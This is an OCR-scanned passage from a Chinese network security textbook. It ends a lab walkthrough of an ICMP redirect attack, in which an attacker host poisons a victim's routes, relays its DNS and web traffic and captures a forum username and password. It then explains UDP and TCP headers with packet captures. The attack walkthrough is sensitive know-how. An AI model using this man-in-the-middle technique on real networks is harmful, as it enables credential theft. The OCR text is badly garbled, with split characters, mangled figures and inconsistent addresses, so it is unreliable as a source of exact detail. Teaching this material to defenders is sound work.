Pinging www.ccpc.com [19.1.1.2] with 32 bytes of data: 


19.1.1.2: bytes=32 time:2ms TTLz127 
19.1 : bytes=32 time<1ms TTLz127 
19.1.1.2: bytes=32 time<1ms TTLz127 
10.1.1.2: bytes=32 time<ims TTL=127 


Ping statistics for 19.1.1.2: 

Packets: Sent : 4, Received : 4, Lost : © (6X loss), 
hpproximate round trip times in milli-seconds: 

Minimum = Oms, Maximum = 2ms, Average = Oms 


图 7-48 在 本 机 使 用 域名 访问 Web 服务 器 


默认 网 站 属性 
HTTP 头 自 定义 错误 ASP. NET 
网 站 ISAFI 第 选 器 “】 ” 主 目 录 文档 ”|‖ 目录 安全 性 
连接 到 院 源 时 的 内 容 来 源 
昌 L 计 算 机 上 的 目录) 
四 另 一 台 计算 机 上 的 共享 GE) 
人 〇 重 定向 到 VELOD 
本 地 路 径 (0): [Ei\eee EEAY 
加 脚本 资源 访问 [) 加 记录 访问 
问 读 职 ER) 回 素 引资 源 四) 
YS 入 @) 
回 目录 浏览 @) | 
应 用 程序 设置 
应 用 程序 名 吧 ) 默认 应 用 程序 删除 外 ) 
开始 位 置 供认 网 站 > 
Se 外 配置 @ 
执行 权限 中) 脚本 和 可 执行 文件 > 
应 用 程序 保护 四: [中 (共用 ) | 
确定 取消 


图 7-49 查看 网 站 主 目 录 的 位 置 


/深圳 城市 信息 贴吧 论坛 - Windows Internet Explorer 加 回回 
cepe. com 国 | 外 | 好 lx | 访 jp 

文件 中) 编辑 中) 查看 WW) 收 襄 天 W) 工具 CI) 帮助 

人 宣 收 芯 夹 | 放电 ” 起] 免费 lotmail 尼 ] 

息 深圳 城 市 信息 贴吧 论坛 伍 " 国 了 贮 ”页 面 f) ”安全 GE) 工具 > 各- 


CNm 可 器 
欢迎 您 ! 朋友 ! :-) 
在 此 人 数 我 要 注册 

息 - 新 闻 资 讯 

犁 -互联 网 络 

白 - 网 络 编程 


于 贴图 专区 欢迎 末 到 深圳 城市 信息 WE 论坛 
息 -- 自由 市 场 本 一 如 您 懒得 注册 ， 一 样 可 以 在 这 畅所欲言 11 
自 - 站 务 管理 码 建议 您 申请 注册 ， 这 样 您 会 更 方便 地 发 表 贴 


二 -个 人 设置 Fu! be 
Ra 对 如 果 您 在 使 用 过 程 有 好 的 意见 建议 ， 欢 迎 您 给 
自 - 进 站 画面 了 人 ni 出 


@ Internet 了 民 100% ~ 


图 7-50 在 本 机 访问 “中 网 景 论坛 
202 


第 七 步 : 在 攻击 者 主机 (本 机 ) 运 行 
在 开始 攻击 之 前 , 先 来 查看 一 下 受 
任何 异 


了 攻击 软件 。 
受害 者 


已 浊 - 
党 


mo 


主机 的 路 由 表 , 如 图 7- 
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51 所 示 , 可 见 路 由 表 无 


.00 gc 29 fe b9 85 
I 


Active Routes 
Network Destination 
9.9.0.9 
127.0.0.0 
192.168.111.0 
192.168.111.1 
192.168.111.3 
192.168.111.255 
224.0.0.0 
255.255.255.255 
Default Gateway: 


Netmask 
0.0.0.0 
255.0.0.0 
255.255.255.0 
255.255.255.255 
255.255.255.255 
255.255.255.255 
240.0.0.0 
255.255.255.255 
192.168.111.4 


MS TCP Loopback interface 
.AMD PCNET Family PCI Ethernet hdapter - 数据 


Interface 
.168 . 

ter 
.168. 
.168. 

127. 
.168. 
.168. 
.168. 


攻击 之 前 受 


下 面 在 攻击 主机 人 
块 网 卡 。 如 图 7 这 里 选择 竺 


饶 
宛 


52 所 示 ， 


Packet .dll test application. 
hdapters installed: 


Library version:3, 1, 90, 


1- \DeuiceNNPF_GenericNdisuanhdapter 
2- \Device\NPF_{980B0205-9D74-40E5-A10F-4BSCOF4D8880} 


Select the number of the adapter to open : 2 


如 果 攻 击 机 上 安装 了 ap 网 卡 , 屠 
- 块 网 卡 , 即 IP 地 址 为 1 


害 者 主机 的 路 由 表 


么 首先 选 定 


68.111.1 的 网 卡 。 


接 PP 各 人 相机 并 IP 地 址 、 网 关 IP 地 址 .DNS 服务 器 IP 地 址 和 受害 者 主机 IP 地 址 ， 
攻击 软件 会 自动 获取 这 9 MAC 地 址 信息 ,如 图 7-53 所 示 。 


input localhost ipaddr:192.168.111.1 

192.168.111.1 

localhost MAC: 0.50.56.c0. 6. 1 

input gateway ipaddr:192.168.111.4 

192.168.111.4 

macaddr MAC: 0. c.29.c3.5d.e3 

input dns ipaddr:19.1.1.1 

以 心 克 9 

input redirect ipaddr:192.168.111.3 

192.168.111.3 

mac ddr MAC: 9. 
司 为 =569 


c.29.fe.b9.85 


4 | 


图 7-53 


输入 IP 地 址 .自动 获取 MAC 地 址 
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此 时 ,攻击 机 每 隔 1s 向 受害 者 主机 发 送 一 次 重 定向 攻击 报 文 , 在 受害 者 主机 的 路 由 
人 其 下 一 跳 地 址 设置 为 攻击 机 的 IP 地 址 ， 
这 样 一 来 ,受害 者 发 出 的 DNS 请 求 报 文 将 发 往 攻击 机 。 图 7-54 为 在 受害 者 主机 上 查看 
到 的 路 由 表 。 


°° C:\WINDOWS\systen32\cad. exe 


C:\Documents and SettingsN\You>netstat -r 


MS TCP Loopback interface 
AMD PCNET Family PCI Ethernet hdapter - 数据 | 


Network Destination Netmask Interface 
0.0.0.0 0.0.0.0 s 和 .168 .3 
19.1 255.255.255.255 g E 2 168 . 
127.0.0.0 255.0.0.0 .9.9. i128 
192.168.111.0 255.255.255.0 。 3 .168 
192.168.111.1 255.255.255.255 3 .168 . 
192.168.111.3 255.255.255.255 .9.9. 12Y: 
192.168.111.255 255.255.255.255 e .168. 
224.0.0.0 240.0.0.0 a 。 .168 . 
255.255.255.255 255.255.255.255 上 四 .168 
Default Gateway 192.168.111.4 


图 7-54 在 受害 者 主机 中 


加 的 到 达 DNS 服务 器 的 路 由 信息 


第 八 步 : 受害 者 输入 账户 i 
受害 者 输入 账户 名 和 密码 登 论坛 ”, 如 图 7-55 所 示 。 


“中 网 蜂 


MH 


文件 时 ) ”编辑 中) 查看 WV) 收 鞍 &) 工具 CD) 帮助 吃 


@ 扣 -日 `- 国 国 入 有 暴 六 ix 四 人 -对 国电 
地 址 四 ) | 狗 http: //www. cepe. con/index. asp 加 到 许 接 > 


ETKING 


LINm 四 大 
欢迎 您 ! 朋友 ! :-) 
在 线 人 数 我 要 注册 
自 - 新 闻 资 讯 
息 - 互联 网 络 
自 … 网 络 编程 
自 贴 图 专区 
自 自由 市 场 
自 -站务 管 理 
La 加 果 您 在 使 用 过 程 有 好 的 意见 
外 进 站 国 面 我 们 提出 。 

自 -退出 论坛 如 果 你 想 试 试 发 贴 ， 那 么 可 以 

试 ， 不 要 放 洪 水 哦 :) 


Bl 生 Internet 


欢迎 来 到 深圳 | 城市 信息 贴吧 论 
如 您 懒得 注册 ， 一 样 可 以 在 这 
建议 您 申请 注册 ， 这 样 您 会 更 
子 !1 


第 九 步 : 查看 攻击 机 截获 的 登录 信息 。 

受害 者 在 登录 “中 网 景 论坛 "的 过 程 中 ,首先 向 DNS 服务 器 发 送 请 求 报 文 , 请 求解 析 
www. ccpc. com 对 应 的 IP 地 址 。 攻 击 机 修改 这 个 报 文 的 源 地 址 信息 并 转发 给 DNS 服务 
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器 。 攻 击 机 收 到 DNS 应 答 报 文 之 后 ,取出 应 答 报 文中 的 IP 地 址 10. 1. 1. 2, 根 据 这 个 地 
址 伪造 一 个 ICMP 站 总 问 报 广 活活 妈 受 阁 者 ,使 科 过 首 者 主机 的 于 直到 中 湛 册 一 条 到 半 
10.1.1.2 的 特定 路 由 ,其 下 一 跳 地 址 为 攻击 机 IP, 为 了 保持 监听 的 稳定 性 ,这 个 ICMP 重 
定向 报 文 每 隔 1s 发 送 一 次 。 图 7-56 为 在 受害 者 主机 端 查 看 到 的 路 由 表 , 可 见 其 中 新 添 
ed 


MS TCP Loopback interface 
AMD PCNET Family PCI Ethernet Adapter - 


Netmask Interface Metric 
-0 9.9.9.9 
1 255.255.255.255 
.2 255.255.255.255 
-0 255.0.0.0 
9 255.255.255.0 
1 255.255.255.255 
. 。 .3 255.255.255.255 
192.168.111.255 255.255.255.255 
224.0.0.0 240.0.0.0 
255.255.255.255 255.255.255.255 
Default Gateway: 192.168.111.4 


图 7-56 查看 受害 者 主机 的 路 由 表 


之 后 ,攻击 机 将 DNS 应 答 报 文 的 目的 地 址 改 为 受害 者 的 地 址 ,将 其 转发 给 受害 者 。 
受害 者 与 Web 服务 器 之 间 的 通信 数据 将 经 过 攻击 机 中 转 ,攻击 机 可 以 从 中 转 的 通信 数据 
中 提取 出 敏感 信息 。 图 7-57 为 攻击 机 截获 的 受害 者 的 登录 信息 。 


192.168.111.3 -> 196.1.1.2 


username: jack&passWord:2481&url:1l0ogin.asp&imageField.x:18&imageField. 


图 攻击 机 截获 的 登录 信息 


六 
cn 
ee] 


1. ICMP 重 定向 报 文 的 作用 是 什么 ? 
2. ICMP 重 定向 可 以 实现 哪些 攻击 ? 


205 


第 8 章 
运输 层 协议 及 其 安全 问题 
运输 层 是 整个 网 络 体系 结构 中 的 关键 层次 之 一 。 本 章 讨 论 TCP/IP 体系 中 的 TCP 


和 UDP 以 及 它们 相关 的 安全 问题 。 


en 运输 层 协议 概述 


从 通信 和 信息 处 理 的 角度 看 ,运输 层 的 功能 是 向 它 上 面 的 应 用 层 提 供 通信 服务 。 

下 面 通过 图 8-1 的 示意 图 来 说 明 运 输 层 的 作用 。 局 域 网 1 上 的 主机 A 和 局 域 网 2 上 
的 主机 也 通过 互 连 的 广域网 进行 通信 。 既 然 网 络 层 的 IP 协议 能 够 将 源 主机 发 出 的 分 组 
按照 首部 中 的 目的 地 址 送 交 给 目的 主机 ,那么 ,为 什么 还 需要 在 设置 一 个 运输 层 呢 ? 


主机 A 主机 B 
路 由 器 2 
QP) ee & fa BC ) CBP) 
AP, bpd SC 去 BP, 
区 网 络 层 的 作用 范围 -| 
_, 运输 层 的 作用 范围 | 


图 8-1 运输 层 为 相互 通信 的 应 用 进程 提供 通信 


严格 地 讲 , 两 个 主机 进行 通信 实际 上 就 是 两 个 主机 中 的 应 用 进程 互相 通信 。IP 地 址 
标识 网 络 中 的 主机 ,不 标识 主机 的 应 用 进程 ,因此 ,IP 协议 虽然 能 把 分 组 送 到 目的 主机 ， 
但 是 这 个 分 组 还 停留 在 主机 的 网 络 层 ,没有 交付 给 目的 主机 的 应 用 进程 。 在 一 个 主机 中 ， 
经 常 有 多 个 应 用 进程 同时 分 别 和 另 一 个 主机 中 的 多 个 应 用 进程 进行 通信 。 例 如 , 某 用 户 
在 使 用 浏览 器 浏览 某 网 页 的 同时 ,还 要 用 电子 邮件 给 网 站 发 送 反馈 意见 ,那么 用 户主 机 应 
用 层 不 仅 运行 浏览 器 进程 ,还 要 运行 电子 邮件 进程 。 在 图 8-1 中 ,主机 A 的 应 用 进程 AP， 
和 主机 B 的 应 用 进程 BP; 进行 通信 ,而 与 此 同时 ,主机 A 的 应 用 进程 AP, 也 和 主机 B 的 
应 用 进程 BP, 进行 通信 。 因 此 ,网 络 层 是 为 两 台 主 机 之 间 提 供 通 信 , 而 运输 层 是 为 两 台 
主机 的 两 个 应 用 进程 之 间 提 供 通信 。 

运输 层 的 一 个 很 重要 的 功能 就 是 端口 的 复 用 和 分 用 。 应 用 层 不 同 进程 的 报 文通 过 不 
同 端口 向 下 交 到 运输 层 (端口 复 用 功能 ) ,再 往 下 就 共用 网 络 层 提供 的 服务 。 当 这 些 报 文 
沿 着 图 8-2 中 的 虚线 到 达 目 的 主机 后 ,目的 主机 运输 层 就 使 用 端口 分 用 功能 ,通过 不 同 端 
口 将 报 文 分 别 交付 到 应 用 层 相 应 的 应 用 进程 。 图 8-2 中 间 两 个 长 方形 表示 路 由 器 ,路 由 器 
是 只 有 三 个 协议 层 (物理 层 .数据 链 路 层 、 网 络 层 ) 的 设备 ,路 由 器 的 功能 是 实现 网 络 通信 。 
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图 8-2 运输 层 的 端口 复 用 和 分 用 功能 


运输 层 有 两 个 不 同 的 协议 ,它们 都 是 因特网 的 正式 标准 , 即 : 用 户 数据 报 协议 (User 
Datagram Protocol, UDP) ,传输 控制 协议 (Transmission Control Protocol,TCP) 。 

UDP 是 无 连接 的 协议 ,就 是 UDP 在 传送 数据 之 前 不 需要 先 建立 连接 。 远 地 主机 的 
运输 层 在 收 到 UDP 报 文 后 ,不 需 给 出 任何 确认 。 虽 然 UDP 不 提供 可 靠 交 付 , 但 在 某 些 
情况 下 UDP 却 是 一 种 最 有 效 的 工作 方式 。 

TCP 则 提供 面向 连接 的 服务 。 在 传送 数据 之 前 必须 先 建立 连接 ,数据 传送 结束 后 要 
释放 连接 。 由 于 TCP 要 提供 可 靠 的 、 面 向 连接 的 运输 服务 ,因此 不 可 避免 地 增加 了 许多 
的 开销 ,如 确认 流量 控制 .计时 器 及 连接 管理 等 。 这 不 仅 使 协议 数据 单元 的 首部 增 大 很 
多 ,还 要 占用 许多 的 处 理 机 资源 。 

在 运输 层 ,数据 怎样 封装 与 拆 装 呢 ? 发 送 端 主机 的 应 用 进程 将 报 文 通过 某 个 端口 向 
下 传送 到 运输 层 , 在 运输 层 加 上 首部 ,封装 成 为 UDP 用 户 数据 报 或 TCP 报 文 段 ,向 下 传 
送 给 网 络 层 。 这 是 运输 层 数 据 的 封装 过 程 。 在 接收 端 主机 ,协议 数据 单元 逐 层 向 上 一 一 
拆 封 , 到 达 运 输 层 ,成 为 UDP 用 户 数据 报 或 TCP 报 文 段 。 然 后 , UDP 用 户 数据 报 或 
TCP 报 文 段 被 去 掉 首 部 ,通过 某 个 端口 ,上 交 应 用 层 相 应 的 进程 。 这 就 是 运输 层 数据 的 
拆 装 过 程 , 如 图 8-3 所 示 。 


进程 进程 
报 广 报 文 
TCP 报 文 段 | 首部 | 数据 TCP 报 文 段 | 首部 | 数据 
UDP 用 户 数据 报 ， ， UDP 用 户 数据 报 ， 
[re| JP 数据 [| IP 数 据 
1 1 1 1 
| 旺 首 部 Wi 数据 [ 顺 首 部 帧 数据 
天 中 = 分 
人 封装 (b) 拆 装 


图 8-3 运输 层 数据 的 封装 与 拆 装 
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UDP 和 TCP 都 使 用 了 应 用 层 接口 处 的 端口 与 应 用 进程 进行 通信 。 端 口 是 个 非常 重 
要 的 概念 ,因为 应 用 层 的 各 种 进程 都 是 通过 相应 的 端口 与 运输 层 进行 交互 。 因 此 ,在 运输 
层 的 协议 数据 单元 (TCP 报 文 段 `、UDP 用 户 数 据 报 ) 的 首部 中 都 要 写 入 源 端 口号 和 目的 
端口 号 。 运 输 层 收 到 网 络 层 交 上 来 的 数据 后 ,要 根据 其 目的 端口 号 决定 应 当 通 过 哪 一 个 
端口 上 交 给 目的 应 用 进程 。 

端口 的 作用 就 是 让 各 种 应 用 进程 都 能 将 其 数据 通过 端口 向 下 交付 给 运输 层 , 以 及 让 
运输 层 知道 应 当 将 其 数据 向 上 通过 端口 交付 给 应 用 层 相应 的 进程 。 从 这 个 意义 上 讲 , 端 
口 是 用 来 标识 应 用 层 的 进程 。 图 8-4 强调 了 运输 层 TCP 和 UDP 的 复 用 和 分 用 的 概念 。 
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图 8-4 端口 在 进程 之 间 的 通信 中 所 起 的 作用 


端口 用 16b 端口 号 标志 。 但 端口 号 只 具有 本 地 意义 , 它 只 标识 本 计算 机 应 用 层 各 进 
程 。 因 特 网 中 不 同 计算 机 中 的 相同 的 端口 号 是 没有 联系 的 。16b 的 端口 号 可 允许 有 22 
个 端口 号 ,这 个 数目 对 一 个 计算 机 是 足够 用 的 。 
端口 号 分 为 两 类 。 一 类 是 由 因特网 指派 名 字 和 号 码 公司 ICANN 负责 分 配给 一 些 常 
用 的 应 用 程序 固定 使 用 的 熟知 端口 ,其 数值 一 般 为 0 一 1023 ,例如 表 8-1。 
表 8-1 常用 的 应 用 程序 固定 使 用 的 熟知 端口 


应 用 程序 pir Telnet SMTP DNS TIP TP SNMP 


熟知 端口 21 23 25 53 69 80 161 


另 一 类 端口 则 是 一 般 端口 ,用 来 随时 分 配给 请 求 通信 的 客户 进程 。 为 了 在 通信 时 不 
致 发 送 混乱 ,必须 把 端口 号 和 主机 的 IP 地 址 结合 在 一 起 使 用 。 一 个 TCP 连接 由 它 的 两 
个 端点 来 标识 ,而 每 一 个 端点 又 是 由 IP 地 址 和 端口 号 决定 的 。 
下 面 将 分 别 介绍 UDP 和 TCP 要 点 。UDP 比较 简单 ,本 章 主要 是 讨论 TCP。 
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821 UDP 概述 


用 户 数据 报 协议 UDP 只 是 在 IP 数据 报 服务 上 增加 了 很 少 的 一 点 功能 ,就 是 端口 功 
能 和 差错 检测 功能 。 

虽然 UDP 用 户 数据 报 提供 的 是 无 连接 .不 可 靠 的 服务 ,但 UDP 在 某 些 方面 有 其 特 
殊 的 优点 。 例 如 : 

(1) 发 送 数据 之 前 不 需要 建立 连接 ,当然 发 送 数据 结束 时 也 没有 连接 需要 释放 ,因此 
减少 了 网 络 开销 和 发 送 数据 之 前 的 时 延 。 

(2) UDP 不 使 用 拥塞 控制 ,也 不 保证 可 靠 交 付 。 因 此 ,尽管 网 络 出 现 拥塞 ,也 不 会 降 
低 源 主机 的 发 送 速 率 。 很 多 实时 应 用 (如 人 P 电话、 视频 聊天 ) 都 要 求 源 主机 以 恒定 的 速率 
发 送 数 据 ,并 且 允 许 在 网 络 发 生 拥塞 时 丢失 一 些 数据 ,但 却 不 允许 数据 有 太 大 的 延迟 。 
UDP 正好 适合 这 种 要 求 。 

(3) 尽管 UDP 满足 实时 应 用 的 通信 服务 要 求 ,但 由 于 UDP 不 可 靠 交 付 是 它 的 致命 
缺陷 , 当 很 多 主机 同时 向 网 络 发 送 高 速率 UDP 实时 数据 流 时 ,可 能 发 生 网 络 拥塞 ,造成 
所 有 主机 无 法 正常 接收 。 

表 8-2 给 出 了 运输 层 使 用 UDP 的 一 些 应 用 层 协 议 。 

表 8-2 使 用 UDP 的 各 种 应 用 层 协 议 


应 用 应 用 层 协 议 应 用 应 用 层 协 议 
域名 转换 DNS 网 络 管理 SNMP 
文件 传送 TETP IP 电话 专用 协议 
路 由 选择 协议 RIP 流 式 多 媒体 通信 专用 协议 
IP 地 址 配置 DHCP.BOOTP 多 播 IGMP 


822 UDP 用 户 数据 报 的 首部 


UDP 用 户 数据 报 有 两 个 部 分 : 首部 和 数据 部 分 。 首 部 字段 很 简单 ,只 有 8 字 节 ( 见 
图 8-5) ,由 4 个 字段 组 成 ,每 个 字段 两 个 字 节 。 各 字段 意义 如 下 。 

源 端口 : 源 端 口号 。 

目的 端口 : 目的 端口 号 。 

长 度 : UDP 用 户 数据 报 的 长 度 。 

检验 和 : 防止 UDP 用 户 数据 报 在 传输 中 出 错 。 

下 面 结合 利用 Sniffer 捕捉 到 的 数据 包 分 析 UDP 用 户 数据 报 的 首部 格式 ( 见 图 8-6) 。 
查看 浏览 网 页 抓 到 的 DNS 数据 包 ,运输 层 UDP。UDP 用 户 数据 报 首部 4 个 字段 的 信息 
内 容 : 源 端 口号 1039 ,目的 端口 号 53 ,数据 报 总 长 度 38 字 节 (包括 首部 和 数据 部 分 的 长 
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字 节 和 g 六 2 
源 端口 | 目的 端口 | 长 度 | 检验 和 | 


UDP 用 户 数据 报 | 首部 数据 
发 送 在 前 也 
《一 了 首部 数据 
9 JP 数据 报 


图 8-5 UDP 用 户 数 据 报 的 首部 格式 


度 ) ,检验 和 字段 (检验 正确 )。 


天 5: 一 一 - UDP Header -一 一 
Pp 


TUDI 

UDP: Source Port = 1039 

UDP: Destination port = 53 (Domain) 
= 38 


UDP: Length 


UDP: Checksum = 15C1 (correct) 
UDP: [30 byte(s) of data] 
UDP 


图 8-6 Sniffer 捕 提 的 UDP 用 户 数据 报 的 首部 


83 传输 控制 协议 


8.3.1 TCP 概 述 

TCP 提供 面向 连接 、 可 靠 交 付 的 服务 。 

图 8-7 是 TCP 发 送 和 接收 报 文 段 的 过 程 。 为 了 突出 图 的 要 点 ,只 画 出 了 一 个 方向 的 
数据 流 。 实 际 上 ,只 要 建立 了 TCP 连接 ,就 支持 同时 双向 通信 的 数据 流 。TCP 连接 的 任 
何 一 方 都 能 发 送 和 接收 数据 。 发 送 端 应 用 层 的 应 用 进程 ,不 断 将 长 短 不 同 的 数据 块 ,通过 
发 送 端 接收 庙 

~ 


目 


端口 


[a 
型 
[a 
可 
如 


有 进程 


TCP TCP 
发 送 缓存 接收 缓存 


报 文 段 | 王 >| 报 文 段 “ |》… | 报 文 段 | 一 > 


发 送 TCP 报 文 段 
图 8-7 TCP 发 送 和 接收 报 文 段 的 过 程 
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相应 端口 陆续 送 入 到 运输 层 TCP 发 送 缓存 中 。 从 TCP 发 送 缓存 中 出 来 的 数据 ,是 一 个 
个 大 小 相同 的 TCP 报 文 段 ,逐个 传送 给 下 一 层 网 络 层 。 接 收 端 运输 层 收 到 网 络 层 传 来 的 
TCP 报 文 段 , 暂 存在 接收 缓存 中 ,然后 ,应 用 进程 通过 相应 端口 从 接收 缓存 中 逐个 读 取 数 
据 。 这 就 是 TCP 下 ,数据 传输 的 过 程 。 


832 TCP 报 文 段 的 首部 


下 面 介 绍 TCP 报 文 段 首部 格式 。 一 个 TCP 报 文 段 分 为 首部 和 数据 两 部 分 , 见 
图 8-8。TCP 报 文 段 作为 IP 数据 报 的 数据 部 分 ,前 面 加 上 首部 构成 完整 的 IP 数据 报 。 
和 IP 数据 报 首部 一 样 ,TCP 报 文 段 首部 也 分 为 固定 长 度 部 分 和 可 变 长 度 部 分 。TCP 报 
文 段 首部 的 前 20 个 字 节 是 固定 的 ,后 面 的 可 变 长 度 部 分 是 根据 需要 而 增加 的 选项 。 


人 《IP 首部 IP 数 据 部 分 


TCP 报 文 段 < 本 “首部 数据 


源 端口 地 址 16 位 。 ”| 。 目的 端口 地 址 16 位 


U 
保留 
6 位 |G|K 


校 验 和 16 位 


数据 偏 


AIPIR 
it cjs|s 窗口 值 16 位 


紧急 指针 16 位 


选项 和 填充 
图 8-8 ”TCP 报 文 段 首部 格式 


下 面 结合 利用 Sniffer 捕捉 到 的 数据 包 介绍 TCP 报 文 段 首部 各 字段 的 含义 。 

源 端口 和 目的 端口 字段 : 各 占 两 个 字 节 。 查 看 访问 FTP 服务 器 的 数据 包 , 目 的 端口 
(Destination port) 为 21(FTP 特定 端口 ) , 源 端口 (Source port) 是 一 个 大 于 1024 的 随机 
端口 。 

序号 字段 : 占 4 字 节 。TCP 把 一 个 TCP 连接 传送 的 TCP 报 文 段 的 数据 部 分 看 成 连 
续 的 数据 流 ,数据 流 中 每 一 个 字 节 都 编 上 序号 。 整 个 数据 流 起 始 序号 在 建立 TCP 连接 时 
设置 。 如 图 8-9 所 示 ,当前 TCP 报 文 段 序 号 字段 (Sequence number) 的 值 表示 当前 TCP 
报 文 段 的 数据 部 分 第 一 个 字 节 在 数据 流 中 的 序号 。 例 如 ,一 个 TCP 报 文 段 序号 字段 值 是 
301, 如 果 这 个 TCP 报 文 段 数据 部 分 共 携 带 100 字 节 ,那么 , 它 数据 部 分 最 后 一 个 字 节 序 
号 是 400。 而 下 一 个 TCP 报 文 段 数据 部 分 第 一 个 字 节 序号 就 是 401, 则 下 一 个 TCP 报 文 
段 首部 的 序号 字段 值 是 401。 

确认 号 字段 : 占 4 字 节 , 表 示 告 诉 发 送 端 前 一 个 TCP 报 文 段 已 经 被 正确 接收 ,期 望 
收 到 下 一 个 TCP 报 文 段 首部 序号 字段 的 值 就 是 被 写 入 到 这 个 当前 TCP 确认 报 文 段 的 确 
认 号 字段 中 。 如 图 8-9 所 示 , 当 前 TCP 报 文 段 确认 号 字段 (Acknowledge number) 值 为 
222330673。 例 如 , 设 TCP 连接 两 端 分 别 为 A 和 B,B 正确 收 到 了 A 发 送 来 的 一 个 TCP 
报 文 段 , 其 首部 序号 字段 的 值 是 501, 这 个 TCP 报 文 段 数据 部 分 是 200 字 节 ,这 就 表明 B 
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已 经 正确 接收 了 A 发 送 的 序号 在 501 一 701 之 间 的 数据 。 因 此 ,B 期 望 收 到 A 发 来 的 下 
一 个 TCP 报 文 段 首 部 序号 字段 的 值 为 701。 于 是 ,B 再 发 送 给 A 的 响应 报 文 段 的 首部 确 
认 号 字段 值 为 701 。 

数据 偏 移 字段 : 占 4b, 指 TCP 报 文 段 数据 部 分 起 始 处 距离 整个 TCP 报 文 段 起 始 处 
的 距离 。 这 实际 上 就 是 TCP 报 文 段 首部 长 度 。 由 于 4b 能 表示 的 最 大 十 进 制 数 是 15 ,由 
此 可 计算 首部 长 度 最 大 值 ,根据 数据 偏 移 字 段 的 单位 为 4 字 节 ,因此 ,TCP 报 文 段 首部 长 
度 的 最 大 值 是 60 字 节 。 如 图 8-9 所 示 , 当 前 TCP 报 文 段 数 据 偏 移 字段 (Data offset) 值 为 
20 字 节 。 


Source port = 21 (FTP-ctrl) 
Destination port = 1306 


Sequence nunber = 2223306046 
CP: Next expected Seq number= 2223306073 
CP; Acknowledgment nunber = 4079202834 

Data offset = 20 bytes 


CP; Reserved Bits: Reserved for Future Use (Not shown in the Hex Dunp) 
CP; Flags = 


0 = (No urgent pointer) 
= Acknowledgnent 
1... = Push 
0.. = (No reset) 
0. = (No SYN) 
0 = (No FIN) 
BTCP: Vindow = 64240 
CP: Checksunm = 9658 (correct) 
CP; Urgent pointer =0 


No TCP options 
[27 Bytes of data] 


图 8-9 Sniffer 捕 提 的 TCP 报 文 段 的 首部 


保留 字段 (Reserved Bits) : 占 6b, 保 留 为 今后 使 用 。 

下 面 有 6b 是 说 明 当 前 TCP 报 文 段 性 质 的 控制 位 ,它们 的 意义 如 下 。 

紧急 比特 URG: 当 URG=1 时 ,表示 当前 报 文 段 有 紧急 数据 ,应 尽快 传送 ,而 不 要 按 
原来 的 排队 顺序 来 传送 。 例 如 ,已 经 发 送 的 一 个 程序 要 在 远 地 主 机 上 运行 ,但 后 来 发 现 了 
这 个 程序 存在 一 些 问题 ,需要 取消 该 程序 运行 ,于 是 用 户 从 键盘 发 出 一 中 断 命 令 (Ctrl 十 
C)。 如 果 紧 急 比特 不 设置 为 1, 那 么 即使 用 户 从 键盘 发 出 中 断 命 令 (Ctrl 十 C) ,这 两 个 字 
符 也 会 一 直 排 在 缓存 区 的 末尾 ,只 有 前 面 所 有 的 数据 被 处 理 完毕 ,这 两 个 字符 才能 被 处 
理 , 这 样 就 浪费 了 许多 时 间 。 当 使 用 紧急 比特 置 1 时 ,TCP 会 将 这 两 个 字符 插入 到 当前 
要 发 送 的 TCP 报 文 段 数据 部 分 的 最 前 面 , 而 接收 端 TCP 则 将 这 两 个 字符 不 经 过 缓存 直 
接 交 付 给 应 用 进程 。 

确认 比特 ACK: 当 确认 比特 ACK 二 1 时 ,确认 号 字段 才 有 效 。 当 ACK==0 时 ,确认 
号 无 效 。 

推送 比特 PSH: 也 是 提高 数据 优先 级 别 的 一 个 字段 。 如 果 发 送 端 TCP 将 一 个 TCP 
报 文 段 的 推送 比特 置 1, 则 接收 端 TCP 收 到 这 个 推送 比特 置 1 的 TCP 报 文 段 ,就 优先 把 
这 个 TCP 报 文 段 交付 给 应 用 进程 ,而 不 需要 在 接收 缓存 中 排队 。 

复位 比特 RST: 当 RST=1 时 ,表明 TCP 连接 中 出 现 严 重 差错 ,必须 释放 连接 。 复 
位 比特 置 1 的 TCP 报 文 段 的 权限 非常 高 ,只 要 TCP 连接 双方 ,任何 一 方 发 送 RST 为 1 
的 报 文 段 ,TCP 连接 必须 终止 。 复 位 比特 还 用 来 拒绝 一 个 非法 的 报 文 段 或 拒绝 打开 一 个 
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连接 。 
同步 比特 SYN: 建立 TCP 连接 时 用 来 同步 序号 。 如 图 8-10 所 示 , 人 A 端 向 B 端 发 送 
一 个 请 求 建 立 连接 的 TCP 报 文 段 , 则 这 个 报 文 段 首部 的 同步 比特 SYN= 二 1 ,确认 比特 
ACK 一 0, 确 认 号 字段 无 效 。 若 B 端 同意 建立 连接 , 则 回 送 一 个 确认 报 文 段 ,这 个 确认 报 
文 段 的 同步 比特 SYN=1, 确 认 比 特 ACK 王 1, 确 认 号 字段 有 效 , 表 示 对 刚 收 到 的 A 端 发 
来 的 请 求 建立 连接 的 报 文 段 的 确认 。 对 于 建立 一 个 TCP 连接 ,通信 双方 必须 都 要 先 各 发 
送 一 个 同步 比特 SYN 置 1 的 报 文 段 。 
SYN= 
请 求 建立 连接 报 文 段 
TCP 数 据 部 分 |TCP 首 部 


0 


次 > 
I 
当 史 


ea 确认 报 文 自 
ACK=1 |TCP 首 部 | TCP 数 据 部 分 


图 8-10 同步 比特 SYN 的 说 明 图 


终止 比特 FIN: 用 来 释放 一 个 连接 。 当 FIN=1 时 ,表明 此 TCP 报 文 段 发 送 端 数据 
已 发 送 完 毕 , 要 求 释放 运输 层 TCP 连接 。 如 图 8-11 所 示 , 当 TCP 连接 A 端 请 求 释放 
TCP 连接 时 , 则 它 向 对 端 B 发 送 请 求 释放 连接 的 报 文 段 , 这 个 报 文 段 首部 的 终止 比特 
FIN 二 1。 如 B 端 同意 释放 连接 ,并 且 也 不 再 向 对 端 A 发 送 数据 , 则 B 回 送 确认 报 文 段 给 
A, 这 个 确认 报 文 段 的 终止 比特 FIN 二 1。 如 果 一 个 TCP 连接 两 端 都 同意 释放 连接 ,并 且 
不 再 向 对 端 发 送 数据 ,通信 双方 都 必须 要 各 发 送 一 个 终止 比特 FIN 置 1 的 报 文 段 。 

FIN=1 

请 求 释放 连接 报 文 自 
TCP 数 据 部 分 |TCP 首 部 


区 > 
一， 
雍 史 


FIN=1 确认 报 文 段 
ACK=1 |TCP 首 部 | TCP 数 据 部 分 


图 8-11 终止 比特 FIN 说 明 图 


窗口 字段 (Window): 占 2 字 节 。 窗 口 字段 的 值 是 指 TCP 接收 端 告诉 发 送 端 发 送 给 
